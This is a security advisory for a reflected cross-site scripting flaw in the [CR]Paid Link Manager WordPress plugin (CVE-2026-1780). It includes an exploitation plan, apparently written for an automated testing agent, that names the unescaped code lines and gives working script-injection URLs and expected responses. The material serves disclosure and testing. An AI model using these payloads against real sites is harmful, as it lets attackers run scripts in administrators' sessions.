[CR]Paid Link Manager <= 0.5 - Reflected Cross-Site Scripting
Description
The [CR]Paid Link Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the URL path in all versions up to, and including, 0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NTechnical Details
<=0.5What Changed in the Fix
Changes introduced in v0.6
Source Code
WordPress.org SVN# WordPress Exploitation Research Plan - CVE-2026-1780 ## 1. Vulnerability Summary The **[CR]Paid Link Manager** plugin for WordPress is vulnerable to **Reflected Cross-Site Scripting (XSS)** in versions up to and including 0.5. The vulnerability exists because the plugin directly echoes the values…
Show full research plan
WordPress Exploitation Research Plan - CVE-2026-1780
1. Vulnerability Summary
The [CR]Paid Link Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) in versions up to and including 0.5. The vulnerability exists because the plugin directly echoes the values of $_SERVER["REQUEST_URI"] and $_SERVER["PHP_SELF"] within the administrative dashboard without any sanitization or escaping (e.g., using esc_url() or esc_attr()). This allows an unauthenticated attacker to craft a malicious URL that, when clicked by a logged-in administrator, executes arbitrary JavaScript in the context of the admin's browser session.
2. Attack Vector Analysis
- Endpoint:
wp-admin/admin.php - Vulnerable Parameter: URL path (via
$_SERVER["PHP_SELF"]) and Query String (via$_SERVER["REQUEST_URI"]). - Authentication: None required for the attacker; however, the victim must be a logged-in user with administrative privileges (specifically capability
8, which translates tomanage_options). - Preconditions: The plugin
crpaid-link-managermust be installed and activated. - Vulnerable Code Sinks:
cr-paidlinkmanager.php:92:<a href='".$_SERVER["REQUEST_URI"]."&act=edit...'>cr-paidlinkmanager.php:117:<a href="<?php echo $_SERVER["PHP_SELF"]."?page=cr_paid_link_manager_admin_menu"; ?>">cr-paidlinkmanager.php:127:<form method="post" action="<?php echo $_SERVER["REQUEST_URI"]; ?>">
3. Code Flow
- A user with administrative privileges visits a URL crafted by the attacker, such as:
wp-admin/admin.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E?page=cr_paid_link_manager_admin_menu - WordPress routes the request to the
cr_paid_link_manager_admin_menu()function because thepageparameter matches the menu slug registered incr_paid_link_manager_submit_config_admin(). - Inside
cr_paid_link_manager_admin_menu(), the code encounters line 117:<a href="<?php echo $_SERVER["PHP_SELF"]."?page=cr_paid_link_manager_admin_menu"; ?>">Add new link group</a> $_SERVER["PHP_SELF"]contains the path info including the payload:/wp-admin/admin.php/"><script>alert(1)</script>.- The payload breaks out of the
hrefattribute and executes the script. - Alternatively, if the
actparameter is set toneworedit, line 127 executes:<form method="post" action="<?php echo $_SERVER["REQUEST_URI"]; ?>">$_SERVER["REQUEST_URI"]reflects the entire query string, allowing for similar attribute breakout.
4. Nonce Acquisition Strategy
This vulnerability does not require a nonce.
The reflected XSS occurs during a GET request to the admin dashboard. The plugin fails to use nonces or any other CSRF protection for the display logic of its admin pages. Since the goal is script execution via reflection, the attacker simply needs the victim to visit the page. The add_menu_page capability check (level 8) is the only barrier, which is bypassed because the victim (the administrator) is already authenticated.
5. Exploitation Strategy
Step 1: Admin Session Simulation
The automated agent must first authenticate as an administrator to access the vulnerable menu page.
Step 2: Form Reflection Attack (Vector 1)
Target the REQUEST_URI reflection in the form action.
- URL:
http://localhost:8888/wp-admin/admin.php?page=cr_paid_link_manager_admin_menu&act=new&xss_payload="><script>alert(document.domain)</script> - Tool:
http_request - Method:
GET - Expected Result: The response body will contain:
<form method="post" action="/wp-admin/admin.php?page=cr_paid_link_manager_admin_menu&act=new&xss_payload="><script>alert(document.domain)</script>">
Step 3: Path Info Reflection Attack (Vector 2)
Target the PHP_SELF reflection in the "Add new link group" link.
- URL:
http://localhost:8888/wp-admin/admin.php/"><script>alert(window.origin)</script>?page=cr_paid_link_manager_admin_menu - Tool:
http_request - Method:
GET - Expected Result: The response body will contain:
<a href="/wp-admin/admin.php/"><script>alert(window.origin)</script>?page=cr_paid_link_manager_admin_menu">Add new link group</a>
6. Test Data Setup
- Activate Plugin: Ensure
crpaid-link-manageris active. - No Data Required: The reflection in the
act=newform (Line 127) and the footer link (Line 117) occurs regardless of whether any "Link Groups" exist in the database.
7. Expected Results
- The HTTP response status will be
200 OK. - The response body will contain the literal, unescaped payload
"><script>alert(...)</script>. - The payload will be found specifically inside an
actionattribute of a<form>tag or anhrefattribute of an<a>tag, effectively breaking out of the attribute and injecting a new HTML tag.
8. Verification Steps
- Manual Source Check: Search the response body for the string
"><script>alert. - Context Check: Confirm the reflection is occurring within the context of the
PLManageradmin page by verifying the presence of the header:<h2>[CR]Paid Link Manager - LINK Groups Configuration</h2>.
9. Alternative Approaches
If the act=new check fails or the tables are not initialized:
- Use the Table Body Vector: Even if no groups exist, line 117 (
PHP_SELF) is always rendered at the bottom of the group table. - Use act=delete: Line 144 also uses
$_SERVER["REQUEST_URI"]for the deletion confirmation form:<form method="post" action="<?php echo $_SERVER["REQUEST_URI"]; ?>">
Trigger this via:wp-admin/admin.php?page=cr_paid_link_manager_admin_menu&act=delete&group_id=0&xss="><script>confirm(1)</script>
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.